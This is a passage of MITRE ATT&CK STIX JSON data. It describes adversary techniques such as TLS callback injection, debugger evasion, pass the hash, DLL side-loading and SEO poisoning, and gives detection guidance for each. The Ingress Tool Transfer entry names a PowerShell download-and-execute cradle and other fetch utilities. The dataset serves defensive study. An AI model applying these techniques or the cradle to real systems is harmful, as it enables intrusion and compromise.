Center. (n.d.). Passive DNS. Retrieved October 20, 2020.", "url": "https://www.circl.lu/services/passive-dns/"}, {"source_name": "Azure Active Directory Reconnaisance", "description": "Dr. Nestori Syynimaa. (2020, June 13). Just looking: Azure Active Directory reconnaissance as an outsider. Retrieved May 27, 2022.", "url": "https://o365blog.com/post/just-looking/"}, {"source_name": "DNS Dumpster", "description": "Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.", "url": "https://dnsdumpster.com/"}, {"source_name": "Office 265 Azure Domain Availability", "description": "Microsoft. (2017, January 23). (Cloud) Tip of the Day: Advanced way to check domain availability for Office 365 and Azure. Retrieved May 27, 2022.", "url": "https://docs.microsoft.com/en-us/archive/blogs/tip_of_the_day/cloud-tip-of-the-day-advanced-way-to-check-domain-availability-for-office-365-and-azure"}, {"source_name": "WHOIS", "description": "NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.", "url": "https://www.whois.net/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2024-04-16T00:16:06.689Z", "name": "Software Discovery", "description": "Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nSuch software may be deployed widely across the environment for configuration management or security reasons, such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072), and may allow adversaries broad access to infect devices or move laterally.\n\nAdversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "IaaS", "Linux", "macOS"], "x_mitre_version": "1.4", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58", "created": "2019-09-16T17:52:44.147Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1518", "external_id": "T1518"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-04-19T04:25:33.300Z", "name": "Cloud Service Dashboard", "description": "An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)\n\nDepending on the configuration of the environment, an adversary may be able to enumerate more information via the graphical dashboard than an API. This allows the adversary to gain information without making any API requests.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Praetorian", "Obsidian Security"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor account activity logs to see actions performed and activity associated with the cloud service management console. Some cloud providers, such as AWS, provide distinct log events for login attempts to the management console.(Citation: AWS Console Sign-in Events)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Azure AD", "Office 365", "IaaS", "Google Workspace", "SaaS"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--e49920b0-6c54-40c1-9571-73723653205f", "created": "2019-08-30T18:11:24.582Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1538", "external_id": "T1538"}, {"source_name": "AWS Console Sign-in Events", "description": "Amazon. (n.d.). AWS Console Sign-in Events. Retrieved October 23, 2019.", "url": "https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-event-reference-aws-console-sign-in-events.html"}, {"source_name": "Google Command Center Dashboard", "description": "Google. (2019, October 3). Quickstart: Using the dashboard. Retrieved October 8, 2019.", "url": "https://cloud.google.com/security-command-center/docs/quickstart-scc-dashboard"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Thread Local Storage", "description": "Adversaries may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges. TLS callback injection is a method of executing arbitrary code in the address space of a separate live process. \n\nTLS callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. TLS callbacks are normally used by the OS to setup and/or cleanup data used by threads. Manipulating TLS callbacks may be performed by allocating and writing to specific offsets within a process\u2019 memory space using other [Process Injection](https://attack.mitre.org/techniques/T1055) techniques such as [Process Hollowing](https://attack.mitre.org/techniques/T1055/012).(Citation: FireEye TLS Nov 2017)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via TLS callback injection may also evade detection from security products since the execution is masked under a legitimate process. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Anti-virus", "Application control"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--e49ee9d2-0d98-44ef-85e5-5d3100065744", "created": "2020-01-14T01:30:41.092Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1055/005", "external_id": "T1055.005"}, {"source_name": "FireEye TLS Nov 2017", "description": "Vaish, A. & Nemes, S. (2017, November 28). Newly Observed Ursnif Variant Employs Malicious TLS Callback Technique to Achieve Process Injection. Retrieved December 18, 2017.", "url": "https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html"}, {"source_name": "Elastic Process Injection July 2017", "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Debugger Evasion", "description": "Adversaries may employ various means to detect and avoid debuggers. Debuggers are typically used by defenders to trace and/or analyze the execution of potential malware payloads.(Citation: ProcessHacker Github)\n\nDebugger evasion may include changing behaviors based on the results of the checks for the presence of artifacts indicative of a debugged environment. Similar to [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497), if the adversary detects a debugger, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for debugger artifacts before dropping secondary or additional payloads.\n\nSpecific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as IsDebuggerPresent() and NtQueryInformationProcess(), or manually checking the BeingDebugged flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would \u201cswallow\u201d or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)\n\nAdversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as OutputDebugStringW().(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["TruKno"], "x_mitre_deprecated": false, "x_mitre_detection": "Debugger related system checks will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to debugger identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious [Native API](https://attack.mitre.org/techniques/T1106) function calls as well as processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection.\n\nMonitor debugger logs for signs of abnormal and potentially malicious activity.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Linux", "macOS"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--e4dc8c01-417f-458d-9ee0-bb0617c1b391", "created": "2022-04-01T17:59:46.156Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1622", "external_id": "T1622"}, {"source_name": "Checkpoint Dridex Jan 2021", "description": "Check Point Research. (2021, January 4). Stopping Serial Killer: Catching the Next Strike. Retrieved September 7, 2021.", "url": "https://research.checkpoint.com/2021/stopping-serial-killer-catching-the-next-strike/"}, {"source_name": "hasherezade debug", "description": "hasherezade. (2021, June 30). Module 3 - Understanding and countering malware's evasion and self-defence. Retrieved April 1, 2022.", "url": "https://github.com/hasherezade/malware_training_vol1/blob/main/slides/module3/Module3_2_fingerprinting.pdf"}, {"source_name": "AlKhaser Debug", "description": "Noteworthy. (2019, January 6). Al-Khaser. Retrieved April 1, 2022.", "url": "https://github.com/LordNoteworthy/al-khaser/tree/master/al-khaser/AntiDebug"}, {"source_name": "wardle evilquest partii", "description": "Patrick Wardle. (2020, July 3). OSX.EvilQuest Uncovered part ii: insidious capabilities. Retrieved March 21, 2021.", "url": "https://objective-see.com/blog/blog_0x60.html"}, {"source_name": "ProcessHacker Github", "description": "ProcessHacker. (2009, October 27). Process Hacker. Retrieved April 11, 2022.", "url": "https://github.com/processhacker/processhacker"}, {"source_name": "vxunderground debug", "description": "vxunderground. (2021, June 30). VX-API. Retrieved April 1, 2022.", "url": "https://github.com/vxunderground/VX-API/tree/main/Anti%20Debug"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-03-30T21:01:52.873Z", "name": "Space after Filename", "description": "Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system.\n\nFor example, if there is a Mach-O executable file called evil.bin, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to evil.txt, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to evil.txt (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed (Citation: Mac Backdoors are back).\n\nAdversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Erye Hernandez, Palo Alto Networks"], "x_mitre_detection": "It's not common for spaces to be at the end of filenames, so this is something that can easily be checked with file monitoring. From the user's perspective though, this is very hard to notice from within the Finder.app or on the command-line in Terminal.app. Processes executed from binaries containing non-standard extensions in the filename are suspicious.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--e51137a5-1cdc-499e-911a-abaedaa5ac86", "created": "2020-02-10T20:47:10.082Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1036/006", "external_id": "T1036.006"}, {"source_name": "Mac Backdoors are back", "description": "Dan Goodin. (2016, July 6). After hiatus, in-the-wild Mac backdoors are suddenly back. Retrieved July 8, 2017.", "url": "https://arstechnica.com/security/2016/07/after-hiatus-in-the-wild-mac-backdoors-are-suddenly-back/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Re-opened Applications", "description": "Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to \"Reopen windows when logging back in\".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist within the ~/Library/Preferences/ByHost directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user\u2019s next logon.\n\nAdversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the com.apple.loginwindow.[UUID].plist file to execute payloads when a user logs in.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Monitoring the specific plist files associated with reopening applications can indicate when an application has registered itself to be reopened.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--e5cc9e7a-e61a-46a1-b869-55fb6eab058e", "created": "2020-01-24T18:15:06.641Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1547/007", "external_id": "T1547.007"}, {"source_name": "Re-Open windows on Mac", "description": "Apple. (2016, December 6). Automatically re-open windows, apps, and documents on your Mac. Retrieved July 11, 2017.", "url": "https://support.apple.com/en-us/HT204005"}, {"source_name": "Methods of Mac Malware Persistence", "description": "Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.", "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf"}, {"source_name": "Wardle Persistence Chapter", "description": "Patrick Wardle. (n.d.). Chapter 0x2: Persistence. Retrieved April 13, 2022.", "url": "https://taomm.org/PDFs/vol1/CH%200x02%20Persistence.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-03-13T20:35:52.302Z", "name": "SEO Poisoning", "description": "Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site\u2019s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO)\n\nTo help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).(Citation: ZScaler SEO)(Citation: Atlas SEO)\n\nAdversaries may also purchase or plant incoming links to staged capabilities in order to boost the site\u2019s calculated relevance and reputation.(Citation: MalwareBytes SEO)(Citation: DFIR Report Gootloader)\n\nSEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.(Citation: ZScaler SEO)(Citation: Sophos Gootloader)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Goldstein Menachem", "Vijay Lalwani", "Will Thomas, Equinix Threat Analysis Center (ETAC)", "Will Jolliffe", "Hiroki Nagahama, NEC Corporation", "Manikantan Srinivasan, NEC Corporation India", "Pooja Natarajan, NEC Corporation India"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--e5d550f3-2202-4634-85f2-4a200a1d49b3", "created": "2022-09-30T21:14:12.284Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1608/006", "external_id": "T1608.006"}, {"source_name": "MalwareBytes SEO", "description": "Arntz, P. (2018, May 29). SEO poisoning: Is it worth it?. Retrieved September 30, 2022.", "url": "https://www.malwarebytes.com/blog/news/2018/05/seo-poisoning-is-it-worth-it"}, {"source_name": "Atlas SEO", "description": "Atlas Cybersecurity. (2021, April 19). Threat Actors use Search-Engine-Optimization Tactics to Redirect Traffic and Install Malware. Retrieved September 30, 2022.", "url": "https://atlas-cybersecurity.com/cyber-threats/threat-actors-use-search-engine-optimization-tactics-to-redirect-traffic-and-install-malware/"}, {"source_name": "Sophos Gootloader", "description": "Szappanos, G. & Brandt, A. (2021, March 1). \u201cGootloader\u201d expands its payload delivery options. Retrieved September 30, 2022.", "url": "https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/"}, {"source_name": "DFIR Report Gootloader", "description": "The DFIR Report. (2022, May 9). SEO Poisoning \u2013 A Gootloader Story. Retrieved September 30, 2022.", "url": "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/"}, {"source_name": "ZScaler SEO", "description": "Wang, J. (2018, October 17). Ubiquitous SEO Poisoning URLs. Retrieved September 30, 2022.", "url": "https://www.zscaler.com/blogs/security-research/ubiquitous-seo-poisoning-urls-0"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-13T17:57:12.528Z", "name": "Modify Alarm Settings", "description": "Adversaries may modify alarm settings to prevent alerts that may inform operators of their presence or to prevent responses to dangerous and unintended scenarios. Reporting messages are a standard part of data acquisition in control systems. Reporting messages are used as a way to transmit system state information and acknowledgements that specific actions have occurred. These messages provide vital information for the management of a physical process, and keep operators, engineers, and administrators aware of the state of system devices and physical processes. \n\nIf an adversary is able to change the reporting settings, certain events could be prevented from being reported. This type of modification can also prevent operators or devices from performing actions to keep the system in a safe state. If critical reporting messages cannot trigger these actions then a [Impact](https://attack.mitre.org/tactics/TA0105) could occur. \n\nIn ICS environments, the adversary may have to use [Alarm Suppression](https://attack.mitre.org/techniques/T0878) or contend with multiple alarms and/or alarm propagation to achieve a specific goal to evade detection or prevent intended responses from occurring. (Citation: Jos Wetzels, Marina Krotofil 2019) Methods of suppression often rely on modification of alarm settings, such as modifying in memory code to fixed values or tampering with assembly level instruction code. ", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "inhibit-response-function"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.2", "x_mitre_data_sources": ["Application Log: Application Log Content", "Operational Databases: Process History/Live Data", "Network Traffic: Network Traffic Content"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0838", "external_id": "T0838"}, {"source_name": "Jos Wetzels, Marina Krotofil 2019", "description": "Jos Wetzels, Marina Krotofil 2019 A Diet of Poisoned Fruit: Designing Implants & OT Payloads for ICS Embedded Devices Retrieved. 2019/11/01 ", "url": "https://troopers.de/downloads/troopers19/TROOPERS19_NGI_IoT_diet_poisoned_fruit.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-07-28T18:24:16.246Z", "name": "Pass the Hash", "description": "Adversaries may \u201cpass the hash\u201d using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash.\n\nWhen performing PtH, valid password hashes for the account being used are captured using a [Credential Access](https://attack.mitre.org/tactics/TA0006) technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.\n\nAdversaries may also use stolen password hashes to \"overpass the hash.\" Similar to PtH, this involves using a password hash to authenticate as a user but also uses the password hash to create a valid Kerberos ticket. This ticket can then be used to perform [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.(Citation: Stealthbits Overpass-the-Hash)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "lateral-movement"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Blake Strom, Microsoft 365 Defender", "Travis Smith, Tripwire"], "x_mitre_deprecated": false, "x_mitre_detection": "Audit all logon and credential use events and review for discrepancies. Unusual remote logins that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity. NTLM LogonType 3 authentications that are not associated to a domain login and are not anonymous logins are suspicious.\n\nEvent ID 4768 and 4769 will also be generated on the Domain Controller when a user requests a new ticket granting ticket or service ticket. These events combined with the above activity may be indicative of an overpass the hash attempt.(Citation: Stealthbits Overpass-the-Hash)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["System Access Controls"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--e624264c-033a-424d-9fd7-fc9c3bbdb03e", "created": "2020-01-30T16:36:51.184Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1550/002", "external_id": "T1550.002"}, {"source_name": "Stealthbits Overpass-the-Hash", "description": "Warren, J. (2019, February 26). How to Detect Overpass-the-Hash Attacks. Retrieved February 4, 2021.", "url": "https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Exfiltration Over Physical Medium", "description": "Adversaries may attempt to exfiltrate data via a physical medium, such as a removable drive. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a physical medium or device introduced by a user. Such media could be an external hard drive, USB drive, cellular phone, MP3 player, or other removable storage and processing device. The physical medium or device could be used as the final exfiltration point or to hop between otherwise disconnected systems.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "exfiltration"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["William Cain"], "x_mitre_detection": "Monitor file access on removable media. Detect processes that execute when removable media are mounted.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_system_requirements": ["Presence of physical medium or device"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--e6415f09-df0e-48de-9aba-928c902b7549", "created": "2017-05-31T21:30:46.461Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1052", "external_id": "T1052"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-05-09T14:00:00.188Z", "name": "DLL Side-Loading", "description": "Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).\n\nSide-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation: FireEye DLL Side-Loading)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so) as well as the introduction of new files/programs. Track DLL metadata, such as a hash, and compare DLLs that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "2.0", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Anti-virus", "Application Control"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "created": "2020-03-13T19:41:37.908Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1574/002", "external_id": "T1574.002"}, {"source_name": "FireEye DLL Side-Loading", "description": "Amanda Steward. (2014). FireEye DLL Side-Loading: A Thorn in the Side of the Anti-Virus Industry. Retrieved March 13, 2020.", "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-04-11T15:08:01.731Z", "name": "Ingress Tool Transfer", "description": "Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)). \n\nOn Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest. On Linux and macOS systems, a 